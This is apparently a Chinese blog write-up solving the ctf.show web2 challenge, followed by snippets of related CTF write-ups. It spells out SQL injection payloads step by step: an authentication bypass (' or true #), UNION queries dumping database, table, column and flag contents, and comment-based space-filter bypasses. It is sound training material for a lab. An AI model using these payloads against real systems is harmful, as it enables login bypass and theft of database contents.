代码编织梦想

题目:

<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web2</title>
</head>
<body>
    <center>
    <h2>ctf.show_web2</h2>
    <hr>

        <form method="post">
        用户名:<input type="text" name="username"><br><br>
        密&nbsp;&nbsp;&nbsp;码:<input type="password" name="password"><br><br>
        <input type="submit" value="登陆">
        
    </form>
    </center>

</body>
</html>

解题思路:

题目是登陆框,猜测是SQL注入。先对万能密码尝试

password=1&username=1' or true #

![image.png](https://img-blog.csdnimg.cn/img_convert/961171a0a4ead9652e3530259af2aee0.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u6770cdf5&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86480&status=done&style=none&taskId=u56a08447-d029-4923-ba8b-1954db4bd80&title=&width=1536)
果然存在SQL注入,但是没有flag回显。可能考点并非万能登陆,而是flag存放在数据库里。接下来爆一下ctfshow的占位符是几

password=1&username=1' union select 1,2,3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/ed694841fc883983c27f437e58c1e39a.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u12714eba&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95716&status=done&style=none&taskId=uad8d60f3-e8af-4bcb-b464-42b32718285&title=&width=1536)
已知占位符是2,开始爆数据库库名

password=1&username=1' union select 1,database(),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/92d62a8a6b94795df2b2b22a83966de9.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1caacf13&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=98153&status=done&style=none&taskId=u4a5b2657-60ba-40db-adcc-a7e1e711057&title=&width=1536)
已知数据库库名为web2,继续爆数据库表

password=1&username=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/53cdd1a0c1592749d445433f06773836.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1204504f&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=105918&status=done&style=none&taskId=u823803b9-9fc4-4660-b922-e6e7b7a92ec&title=&width=1536)
当前已知表名是flag和user这两个表,很有可能flag在flag表中或者flag在flag表的字段里。继续爆字段

以下两种payload均可

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' #

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() #

![image.png](https://img-blog.csdnimg.cn/img_convert/dbc88ee2e05d2acc04c50a08386a358c.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=uf2152f2a&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102001&status=done&style=none&taskId=u18486a51-ecfa-4d1c-b3da-163a9ee5ffc&title=&width=1536)
之前一直没找到flag,flag也许就藏在表内容里了。最后爆出flag表中的内容

以下两种payload均可
password=2&username=1' union select 1,(select * from flag),3 #
password=2&username=1' union select 1,(select flag from flag),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/89721a792d68ffb83f85d00186edfe15.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u4324edfa&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94195&status=done&style=none&taskId=u0ba82ce0-ffd6-481f-be07-9ca3815a7d2&title=&width=1536)
获得题目flag为:ctfshow{1aefca01-afd4-4527-a35b-c5a8be893ae0}

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liyuwei888/article/details/124705014

ctf.show web2 最简单的SQL注入-爱代码爱编程

ctf.show web2 最简单的SQL注入 1、一开始的页面 随便输入用户名和密码看它怎么反应没报错,只是清空了用户名和密码 题目提示是sql注入,那就用burpsuit抓个包,发送到repeater点击go既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’

ROSE笔记-ctf.show_web2-WP-爱代码爱编程

ctf.show_web2-WP 直接是一个登录界面,在用户名处输入万能密码 admin' or 1=1 # 显示了登陆信息,现在就是去找回显位置。用order by判断当前查询的列数,order by 4的时候登陆信息消失,而order by 3的时候存在登陆信息。至此,判断回显位置 admin' or 1=1 union select 1

ROSE笔记-ctf.show_web7-WP-爱代码爱编程

ctf.show_web7 使用盲注 payload: /?id=1’ or 1=1# 发现过滤了空格所以报错 用//替换空格 payload: /?id=1’//or/**/1=1#此时页面正常显示 接下来就是查库、查表、查字段 查到显示位置 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,2,3#

ROSE笔记-ctf.show_web6-WP-爱代码爱编程

ctf.show_web6 直接输入 admin' or 1=1# 显示错误,说明过滤了空格 所以用户名处把空格替换为/**/后输入 admin'/**/or/**/1=1# 开始 admin'/**/or/**/1=1/**/order/**/by/**/3# admin'/**/or/**/1=1/**/union/**/select

CTF.show:WEB:web签到题-web4-爱代码爱编程

ctf.show做题记录 web签到题web2web3web4 web签到题 查看源码得到flag web2 手抖点到hint索性直接全抄 1.查当前数据库名称 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 得到数据库名称web2 2.查看数据库表的数量 ' or 1

CTF.show:web6-爱代码爱编程

登陆窗,先想到sql注入 抓包测试发现失败 利用/**/代替空格进行绕过 username=admin'/**/or/**/1=1#&password=123456 利用联合查询找到回显位置 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=1

CTF.show:web7-web8-爱代码爱编程

web7 这题是一题盲注题,对url进行盲注测试 从网上找到的师傅的爆表名脚本 import requests url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/" def db(url): # 爆库名 for i

CTF.show:web9-爱代码爱编程

打开题目发现有注入框,简单的注入测试后发现没有效果,扫描一下,发现存在robots.txt 进入robots.txt查看文件 下载后打开发现有源代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("passw

CTF.show:web13-爱代码爱编程

扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $

CTF.show:web14-爱代码爱编程

打开来后执行语句得到提示 ?c=3 当c为3时,不会退出循环,进而执行下一个case语句得到urlhere_1s_your_f1ag.php 进入之后发现是一道注入题目 查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestr

ctf.show_web11-爱代码爱编程

源码: <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,""

ctf.show_web12-爱代码爱编程

f12提示: <!-- hit:?cmd= --> 传参?cmd=hightlight_file(“index.php”); 得到源码: <?php error_reporting(0); ?> <html lang="zh-CN"> <head> <meta http-equiv="

ctf.show_web4-爱代码爱编程

查看题目 发现题目要求get请求传输一个url参数,并且看到了include,估计需要使用伪协议进行包含,进行尝试 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input 发现报错error,继续尝试其他协议发现都显示error 尝试直接在后面

ctf.show web入门-爱代码爱编程

目录 信息收集 web1:【where is flag】 web2:【无法查看源代码】  web3:【where is flag】 web4:【robots】 web5:【phps文件泄露】  web6:【网站源码泄露】 web7:【git】  web8:【svn泄露】 web9:【vim缓存泄露】  web10:【cookie】

2022第二届网刃杯网络安全大赛_网络安全大赛cs-爱代码爱编程

目录 前言      一、ICS1-ncsubj      二、ICS2-carefulguy      三、ICS3-喜欢移动的黑客      四、ICS4-easyiec      五、ICS5-xyp07      六、ICS6-LED_BOOM       七、ICS7-需要安全感 前言 前段时间在机缘巧合下参加了这